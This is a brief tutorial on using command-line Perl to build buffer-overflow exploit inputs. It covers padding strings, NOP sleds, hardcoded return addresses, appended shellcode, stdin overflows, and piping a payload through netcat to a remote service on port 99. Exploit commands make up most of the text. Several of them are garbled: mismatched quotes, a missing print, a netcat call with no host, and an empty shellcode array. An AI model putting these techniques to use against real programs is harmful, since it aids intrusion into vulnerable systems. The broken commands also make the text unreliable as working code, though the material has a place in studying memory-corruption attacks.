Brief tutorial on using Perl for developing exploits.
************** priestmasters perl for vuln developers ******************
Command line perl is a very effective tool for vuln developement. It's
very easy to concatenate, repeat data and build proof of concept
exploit. You need very long if you always compile and change a
C program. An example:
perl -e 'print "A"x100'
print 100 'A' characters. Useful for buffer overflow exploits.
./vuln `perl -e "A"x100'`
Start the vuln program and print 100 "A" as first parameter.
./vuln `perl -e "A"x100'` `perl -e "B"x1500'`
Start the vuln program. `perl -e "A"x100'` is the first parameter and
`perl -e "B"x1500'` is the second one. The whitespace between the perl
commandos is important if you have more parameters.
You also can concatenate some strings:
./vuln `perl -e '"A"x256 . "\x90\xff\xff\xbf"'`
print 256 "A" and 0xbfffff90 in little endian (intel platforms).
If you need shellcode in your buffer make something like that:
./vuln `perl -e "\x90"x20``cat shellcode``perl -e 'print "\x41\x42\x43\x44"'`
Print 20 nops (\x90) then add file shellcode (it's a file with binary shellcode
data) and then overflow a return address for example with 0x44434241. This
string is only one parameter, because there is nowhere a space character
between the commando subtitutions (`xyz` is commando substitution).
If you need binary shellcode data, download a shellcode and make a
print("%s", shellcode). Cat it to stdout (./shellcode > shellcodebin.
//* Linux x86 28 byte shellcode. by */
// File shellcode.c
#include <stdio.h>
// The shellcode string
char shellcode[]=
// This code launch the shellcode, but we need it in binary
/* void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr(); */
printf("%s", shellcode);
hack@exploit:~ > gcc shellcode.c -o shellcode ; ./shellcode > shellcodebin
Another way to overflow is this: (for vulnerable function likes gets(),
scanf(), ...):
perl -e 'print "\x90"x100' > buf
cat shellcode >> buf
perl -e 'print "\x90\xff\xff\xbf"' >> buf
and then start your vuln program: ./vuln < buf.
This is the easiest way to overflow stdin.
Now an example for remote exploits. You can pipe it to netcat.
perl -e "A"x265 . "\x12\xff\xff\xbf" | nc 99
for a vulnerable program on port 99.
I hope this helps a little bit. Sorry for my english. If you have
questions or you find a mistake, please mail me. <> My URL is